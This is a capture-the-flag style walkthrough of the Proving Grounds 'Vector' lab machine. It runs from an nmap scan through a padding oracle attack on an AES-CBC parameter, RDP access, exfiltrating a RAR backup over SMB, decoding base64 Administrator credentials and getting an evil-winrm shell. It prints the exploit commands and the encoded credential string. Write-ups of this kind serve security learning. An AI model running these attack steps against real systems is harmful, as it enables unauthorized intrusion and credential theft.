Vector
Proving Ground Practice Hard Level Machine ! You mainly gona learn about Cryptography and Padding Oracle Attack.
Port Scan Results ⤵️
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
┌──(kali🔥kali)-[~/Downloads/Proving_Ground/Practice/Vector]
└─$ sudo nmap -sC -sV -p- -vv -T4 -oN Nmap_Results.txt -Pn 192.168.155.119
Nmap scan report for 192.168.155.119
Host is up, received user-set (0.093s latency).
Scanned at 2024-07-01 08:39:41 IST for 160s
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesnt have a title (text/html; charset=utf-8).
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 125 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
2290/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
|_http-title: Site doesnt have a title (text/html; charset=utf-8).
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
|_ssl-date: 2024-07-01T03:12:20+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: VECTOR
| NetBIOS_Domain_Name: VECTOR
| NetBIOS_Computer_Name: VECTOR
| DNS_Domain_Name: vector
| DNS_Computer_Name: vector
| Product_Version: 10.0.17763
|_ System_Time: 2024-07-01T03:11:40+00:00
| ssl-cert: Subject: commonName=vector
| Issuer: commonName=vector
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-03-22T16:36:29
| Not valid after: 2024-09-21T16:36:29
| MD5: 3a68:bca7:93da:d9d9:0748:1a1d:b6a1:9e0c
| SHA-1: 5ae7:a6d8:afd7:50a4:e1bf:d7b6:21c7:23b9:7aac:a79a
| -----BEGIN CERTIFICATE-----
| MIIC0DCCAbigAwIBAgIQV3xP7PEZnK1OsuzHBkam8TANBgkqhkiG9w0BAQsFADAR
| MQ8wDQYDVQQDEwZ2ZWN0b3IwHhcNMjQwMzIyMTYzNjI5WhcNMjQwOTIxMTYzNjI5
| WjARMQ8wDQYDVQQDEwZ2ZWN0b3IwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
| AoIBAQDGdPie+1SGnkr6ZU78dpEEWL5oHKrXOGPLy18cTze1sFVbaI5/VOZMVkZv
| k8WGIuuKtqe+B8P2I7p5YdpN06CUnEtLGHik2h9vsiXpWShLMrzt5wkSbr9mJ7HT
| UunqmHwYx+d83y/BIdh+VHnXQyLS6OG2xLhiTM8LJVUvPnU+RJwPSYlRj7QL/y4Y
| JcuLkj/81wRINh5lErAWMBeSiKna5C/54dwhlfsM5pTGAZGetoUW+bArV6wvXlcQ
| pDj5yZSpEoiA/kZW0zTUuupNmQnoB7erBQcDk9foQJozHkRTp3C1dkHncBDjltYo
| f3fwSNtAKF3bH0nT1t9nRezBywQtAgMBAAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUF
| BwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEADAuVG4npJs4vv/ww
| e0MJ3hkFI+1hR9k0u+jnEt3cCMuDp5zarsnWIsn0KCvGXlSl64+4pOuKEH0/XrJm
| ShK+5F6tBIyLyV2ZsZ1OjxtJ6y5DRq6Qp9BLTVZvEfVbEsiRcBD6Y3yL4WbjfMfu
| m1KejISkCPTDi9l+4q6Oi8VQBmElJxkZBzpKnbTyZK/QYohT5HdfpWDywmeSOOSM
| r6tlkV9wKa6IdloPhhEaL017MaMCR4ucraeew+dfH8yhww6LbCZwY6rVKlWgQdEo
| 7ZgbPA6/QYu06GAIYcJkRTy6DxdcMu2KVjLIR2M34FEUDsGQXFL6jqnXBfbByuNA
| utpBTw==
|_-----END CERTIFICATE-----
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 8058/tcp): CLEAN (Timeout)
| Check 2 (port 11018/tcp): CLEAN (Timeout)
| Check 3 (port 63046/udp): CLEAN (Timeout)
| Check 4 (port 31163/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2024-07-01T03:11:42
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Web Enumeration ⤵️
I checked port 2290 and I found this page indicating a missing parameter 🔻
Specifies me about c parameter While giving the parameter I got this 0 value so I checked its source code 🔻 
While using c parameter I get 0 as default value 
Source code of this page
Now I am dealing with AES-256-CBC-PKCS7 cryptography so I need to research further as I searched related to its exploit I got this vulnerability highlighted 🔻
AES-256-CBC-PKCS7 key is related to Oracle Attack
I found this link interestingly to extract the value out of this cypher text.
Padding Oracle Attack
If you have an cyphertext (encrypted text) using AES-256-CBC-PKCS7 (or DES) and an oracle you can run this attack. Lots more details here: https://github.com/mpgn/Padding-oracle-attack
1
python3 exploit.py -c '4358b2f77165b5130e323f067ab6c8a92312420765204ce350b1fbb826c59488' -l '8' --host target.ip:2290 -u '/?c=' -v --error '0'
Another example site 🔻
https://github.com/halloweeks/AES-256-CBC
1
python3 exploit.py -c 4358b2f77165b5130e323f067ab6c8a92312420765204ce350b1fbb826c59488 -l 16 --host 192.168.155.119:2290 -u /?c= -v --error '<span id="MyLabel">0</span>'
Exploit gives me the decrypted password from that AES key
I got the password now so lets see what it can perform 🔻
Got connection with victor creds, and checked through netexec Tool
I connected the rdp connection with remmina Tool.
RDP connection using remmina Tool
To copy this rar file to the attacker machine I used smb server 🔻
Sharing of files using impacket-smbshare Tool
On Attacker Machine 🔻
Coping file to the sharing location
I got the copied file on my attacker machine so lets extract it 🔻
Extract the rar file without password
It requires a password .
Extracted the rar file with password
I used the password of victor to decrypt this rar file .
1
2
3
4
5
6
7
┌──(kali🔥kali)-[~/Downloads/Proving_Ground/Practice/Vector]
└─$ cat backup.txt
QWRtaW5pc3RyYXRvcjpFdmVyeXdh........hcDM3NQ==
┌──(kali🔥kali)-[~/Downloads/Proving_Ground/Practice/Vector]
└─$ echo QWRtaW5pc3RyYXRvcjpFdmVyeXdheUxhYmVsV3JhcDM3NQ== | base64 -d
Administrator:<PASSWORD>
netexec Tool connection on winrm service
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
┌──(kali🔥kali)-[~/Downloads/Proving_Ground/Practice/Vector]
└─$ evil-winrm -i 192.168.155.119 -u Administrator -p '<PASSWORD>'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
t*Evil-WinRM* PS C:\Users\Administrator> tree /f /a
Folder PATH listing
Volume serial number is 7ADA-B29F
C:.
| stop
|
+---3D Objects
+---Contacts
+---Desktop
| proof.txt
|
+---Documents
+---Downloads
+---Favorites
| | Bing.url
| |
| \---Links
+---Links
| Desktop.lnk
| Downloads.lnk
|
+---Music
+---Pictures
+---Saved Games
+---Searches
\---Videos
*Evil-WinRM* PS C:\Users\Administrator> cat Desktop\proof.txt
28ccdd3a848dd67f089e494a55149940
*Evil-WinRM* PS C:\Users\Administrator>
I am Administrator Now !!
If you have any questions or suggestions, please leave a comment below. Thank You !